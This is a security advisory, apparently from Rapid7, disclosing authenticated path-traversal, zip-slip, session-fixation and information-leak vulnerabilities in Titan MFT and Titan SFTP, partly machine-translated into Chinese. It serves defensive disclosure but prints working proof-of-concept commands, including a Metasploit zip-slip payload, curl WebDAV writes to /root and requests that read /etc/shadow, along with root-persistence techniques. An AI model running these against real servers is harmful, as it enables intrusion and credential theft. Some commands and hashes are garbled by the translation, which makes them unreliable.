Last updated at Wed, 27 Dec 2023 14:37:41 GMT

作为我们持续研究管理文件传输风险项目的一部分,包括 JSCAPE MFT and Fortra Globalscape EFT Server, Rapid7 discovered several vulnerabilities 在South River Technologies的Titan MFT和Titan SFTP服务器中. 尽管这些需要特殊情况或非默认配置, as well as a valid user login, 利用的后果可能导致远程超级用户访问受影响的主机.

Products

Titan MFT and Titan SFTP 企业级管理文件传输(MFT)服务器提供企业级服务吗, high-availability failover and clustering. They are very similar products with a similar code base, although Titan MFT has some extra features such as WebDAV.

我们确认这些问题影响了泰坦MFT和泰坦SFTP版本2.0.16.2277 and 2.0.17.2298 (earlier versions are also affected, per the vendor). All issues listed below affect the Linux version, 有些还会影响Windows版本(我们会注意哪些平台受到哪些问题的影响).

Discoverer

These issues were discovered by Ron Bowes of Rapid7. 它们将按照Rapid7的漏洞披露政策进行披露.

Vendor Statement

South River Technologies is committed to security, and we collaborate with valued researchers, such as Rapid7, 代表我们的客户响应和解决漏洞.

Impact

Successful exploitation of several of these issues grants an attacker remote code execution as the root or SYSTEM user; however, 所有问题都是在身份验证后出现的,需要非默认配置,因此不太可能出现大规模利用.

Vulnerabilities

CVE-2023-45685:通过“zip slip”执行身份验证远程代码

Titan MFT and Titan SFTP have a feature where .Zip文件可以在通过任何支持的协议上传时自动提取. Files within the .zip archive are not validated for path traversal characters; as a result, an authenticated attacker can upload a .zip file containing a filename such as ../../file,它将在用户的主目录之外提取. This affects both Linux and Windows servers, 但我们将以Linux为例来说明如何利用这一点.

如果攻击者可以将文件写入Linux文件系统的任何位置, 他们可以利用它以几种不同的方式获得对目标主机的远程访问:

  • Overwrite /root/.ssh/authorized_keys 使用攻击者的SSH密钥,允许他们登录到交互式会话
  • Upload a script to /etc/cron.hourly that will execute code at some point in the future
  • Upload a script to /etc/profile.d 该命令将在下次用户登录Linux主机时执行
  • Overwrite a system binary (such as /bin/bash) with a backdoored version

This vulnerability is mitigated in two different ways:

  1. This is a non-default feature, 因此,管理员必须在服务器易受攻击之前对其进行配置
  2. 利用要求用户拥有具有上传文件权限的帐户

Demo

A so-called "zip slip" is a common class of vulnerability, 并且可以使用Metasploit模块创建一个示例文件(注意,这是一个通用模块,它写入包含可执行负载的ELF文件):

msf6 > use exploit/multi/fileformat/zip_slip
[*]没有配置负载,默认为linux/x86/meterpreter/reverse_tcp

msf6 exploit(multi/fileformat/zip_slip) > set FTYPE zip
FTYPE => zip

msf6 exploit(multi/fileformat/zip_slip) > set FILENAME test.zip
FILENAME => test.zip

msf6 exploit(multi/fileformat/zip_slip) > show options

msf6 exploit(multi/fileformat/zip_slip) > set TARGETPAYLOADPATH ../../../../../../../root/testzipslip
TARGETPAYLOADPATH => ../../../../../../../root/testzipslip

msf6 exploit(multi/fileformat/zip_slip) > exploit

[+] test.zip stored at /home/ron/.msf4/local/test.zip
[*] When extracted, the payload is expected to extract to:
[*] ../../../../../../../root/testzipslip

然后用用户可以访问的任何协议(HTTP, FTP, WebDAV, SFTP)上传:

$ ncftp -u 'testuser' -p 'b' 10.0.0.68
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
Connecting to 10.0.0.68...                                                                                          
TitanMFT 2.0.16.2277 Ready.
Logging in...                                                                                                       
Welcome testuser from 10.0.0.227. You are now logged in to the server.
Logged in to 10.0.0.68.                                                                                             
ncftp / > put ~/.msf4/local/test.zip
/home/ron/.msf4/local/test.zip:                        331.00 B    7.92 kB/s

并验证它是否提取了用户主目录之外的文件:

$ ssh root@10.0.0.68 ls /root
testzipslip

Note that the payload generated by Metasploit is an ELF file by default; however, using this technique, any file can be uploaded to any location on the file system.

CVE-2023-45686:通过WebDAV路径遍历的认证远程代码执行

WebDAV处理程序不验证用户指定的路径. 这意味着用户可以通过添加 ../ characters to the WebDAV URL. 成功的利用允许经过身份验证的攻击者将任意文件写入文件系统上的任何位置, leading to remote code execution.

WebDAV is not enabled by default, 因此,管理员必须启用WebDAV才能使目标容易受到攻击. This also doesn't affect Titan SFTP, which doesn't support the WebDAV protocol; additionally, as far as we can tell, this only affects the Linux version of Titan MFT.

Demo

The curl utility with the PUT verb can be used to upload a file (note that --path-as-is is required, otherwise curl will normalize the path and remove the ../ portion of the URL):

$ curl -i -X PUT -u testuser:b——data-binary 'hi'——path-as-is http://10.0.0.68:8080/../../../../../../../../../root/testwebdav
HTTP/1.1 201 Created
Set-Cookie: SRTSessionId=NV7pXyEHw9bdkofCLp3dI5wMq96N7iLD; Path=/; Expires=2023-Sep-25 10:09:14 GMT; HttpOnly
Connection: close
Server: SRT WebDAV Server
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Accept-Ranges: bytes
ETag:“8 f434346648f6b96df89dda901c5176b10a6d83961dd3c1ac88b59b2dc327aa4”

We can verify the file is written from an SSH session:

$ ssh root@10.0.0.68 ls /root/
testwebdav

远程管理服务器的会话固定

类对远程管理服务器的API进行身份验证时 Authorization header (HTTP basic or digest authentication) and sets a SRTSession 头值转换为攻击者已知的值(包括字面值字符串) null),会话令牌被授予攻击者可以使用的特权. 例如,下面的请求会使字符串"test"变成一个有效的会话令牌:

$ curl -u ron:myfakepassword -ik -H 'Srtsessionid: test' 'http://10.0.0.68:41443/WebApi/Process'

We originally identified this as an authentication bypass, 但后来意识到(通过与供应商讨论) Srtsessionid value must match on the client and server, 而且让管理员设置任意标头的可能性非常低. 这对Linux和Windows版本的软件都有影响, 尽管Windows的漏洞利用路径与我们下面讨论的Linux路径不同.

If an attacker can 要么窃取会话令牌,要么欺骗管理员授权任意会话令牌, 可以使用管理访问权限将任意文件写入文件系统,步骤如下(在Linux上):

  • Create a new user with an arbitrary home folder (eg, /root/.ssh)
  • 使用该帐户登录到其中一个文件上传服务,例如FTP
  • Upload a file, such a authorized_keys

由于该服务以root身份运行,因此攻击者可以上传或下载任何文件. 我们实现了一个概念验证,演示了攻击者如何通过滥用管理员级访问在目标系统上实现远程代码执行.

CVE-2023-45688:通过FTP的路径遍历泄露信息

FTP上的SIZE命令不能正确地清理路径遍历字符, 哪一种方法允许经过身份验证的用户获取文件系统上任何文件的大小. 这需要一个可以通过FTP协议登录的帐户, 并且似乎只影响Linux版本的Titan MFT和Titan SFTP.

Demo

You can test this with the netcat utility:

$ nc 10.0.0.69 21
220 TitanMFT 2.0.17.2298 Ready.
USER test 
331 User name okay, need password.
PASS a
230 Welcome test from 10.0.0.227. You are now logged in to the server.
SIZE ../../../../../../../etc/shadow
213 1050
SIZE ../../../../../../../etc/hostname
213 7
SIZE ../../../../../../../etc/nosuchfile
550 No such file or directory

In that example, the attacker can determine that /etc/shadow is 1050 bytes, /etc/hostname is 7 bytes, and /etc/nosuchfile doesn't exist.

CVE-2023-45689:在管理界面中通过路径遍历进行信息泄露

Using the MxUtilFileAction 模型中,管理员可以从文件系统的任何位置检索和删除文件 ../ sequences in their path. Both Linux and Windows servers are affected by this issue. 注意,管理员可以使用其他技术完全访问主机的文件系统, so this is a very minor issue.

Demo

注意:这需要一个有效的会话id(在下面的例子中, 2427A2DD-CBD6-4DA3-B504-0FD0D3473BEB):

$ curl -iks -H 'Content-Type: application/json' -H 'Srtsessionid: 2427A2DD-CBD6-4DA3-B504-0FD0D3473BEB'——data-binary '[{"Model":"MxUtilFileAction","ServerGUID":"db2112ad-0000-0000-0000-100000000001","Action":"l","Data":{"action":"d","fileList":["/var/southriver/srxserver/logs/Local Administration Server/ .../../../../../etc/shadow"],"domainLogs":true}}]' 'http://10.0.0.68:41443/WebApi/Process'
HTTP/2 200 
content-type: application/x-msdownload
date: Tue, 19 Sep 2023 21:02:07 GMT
content-length: 1155
strict-transport-security: max-age=2592000
content-security-policy: base-uri 'self';
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
referrer-policy: origin
content-disposition: attachment; filename=shadow; filename*=UTF-8''shadow

根:$ 6 7 ooiic2ayta6p7lg mmvUvQYTSN美元/ E9DBfOOGldok6gd6iP8G7SeR20Va30JYCKPp14gzMhmOUrw3o0t6erwwemssYgjcDGqYI / jOWA0:19619:0:99999:7:::
[...]

CVE-2023-45690:通过世界可读数据库+日志的信息泄漏

密码散列出现在世界可读的文件中,包括数据库和日志文件. 对主机具有访问权限的非root帐户可以使用这些文件将其权限升级为root. Since shell access is required before this can be leveraged, this vulnerability is fairly minor, 但我们认为,本地特权升级问题仍然需要解决.

You can use the strings 实用程序以任何用户帐户(也可以加载它们)的方式检查数据库文件 sqlite3):

ron@titan:~$ strings /var/southriver/srxserver/database/srxdbDB2112AD555500000000100000000001.db | grep -o '"PasswordHash":"[^"]*"'
“PasswordHash”:“5267768822 ee624d48fce15ec5ca79cbd602cb7f4c2157a516556991f22ef8c7b5ef7b18d1ff41c59370efb0858651d44a936c11b7b144c48fe04df3c6a3e8da”
“PasswordHash”:“72 a8d535781681a613d4f8ed06192020afda3b1b6c3c48a392ffab2df033d23f791bb6ccbe3b134b4a721bfe1cfe6cd06581ca74eaaee5343ccd70dc3115f984”
:“PasswordHash 57 e38b3a0621901ec5c64fa1864a5d16e17ce4ddf9cd084e4e72d0eeec2d270353d033c972e5b5c646422b56f7eaa11fd54baac0a19f6a20cc8d93df6063db30”

You can also export logs with journalctl as any user:

ron@titan2:~$ journalctl -u titanmft.service  | grep 'stored hash'
Sep 26 22:28:36 titan2 srxserver[3526]: 2023-09-26 22:28:36 [Info/-/007]根据存储的散列[7632AC9FECE0727899598E82E1601669F76D1D2AB75F33AE6A57D21060E22DB93E9D267155909E7EC5EECA20382A18D5D246A4CCAF64466D16974124BA0EC22F]验证传入用户,结果为True
Sep 26 22:34:02 titan2 srxserver[3526]: 2023-09-26 22:34:02 [Info/-/065]根据存储的散列[1f40fc92da241694750979ee6cf582f2d5d7d28e18335de05abc54d0560e0f5302860c652bf08d560252aa5e74210546fbbbce8c12cfc7957b2652fe9a75]验证传入用户,结果为True
Sep 26 22:34:15 titan2 srxserver[3526]: 2023-09-26 22:34:15 [Info/-/065]根据存储的散列[1f40fc92da241694750979ee6cf582f2d5d7d28e18335de05abc54d0560e0f5302860c652bf08d560252aa5e74210546fbbbce8c12cfc7957b2652fe9a75]验证传入用户,结果为True
Sep 26 22:34:48 titan2 srxserver[3526]: 2023-09-26 22:34:48 [Info/-/061]根据存储的散列[1f40fc92da241694750979ee6cf582f2d5d7d28e18335de05abc54d0560e0f5302860c652bf08d560252aa5e74210546fbbbce8c12cfc7957b2652fe9a75]验证传入用户,结果为True

Mitigation Guidance

根据南河科技的说法,本披露的问题可以通过应用来补救 vendor-supplied patches to upgrade to version 2.0.18 of Titan SFTP or Titan MFT. Additionally, 这些问题可以通过配置Titan SFTP或Titan MFT服务而不是在本地系统帐户下运行,而是使用具有有限特权的特定Windows或Linux用户帐户来缓解.

Timeline

  • September, 2023 - Rapid7 discovers the vulnerabilities
  • 2023年9月28日- Rapid7找到安全联系人并报告问题
  • September 28, 2023 - Vendor acknowledges our report
  • 2023年9月30日-供应商告知我们大部分问题已经解决
  • 2023年10月11日——讨论并同意披露日期为2023年10月16日
  • 2023年10月16日-此协调披露(包括本博客和所有供应商工件)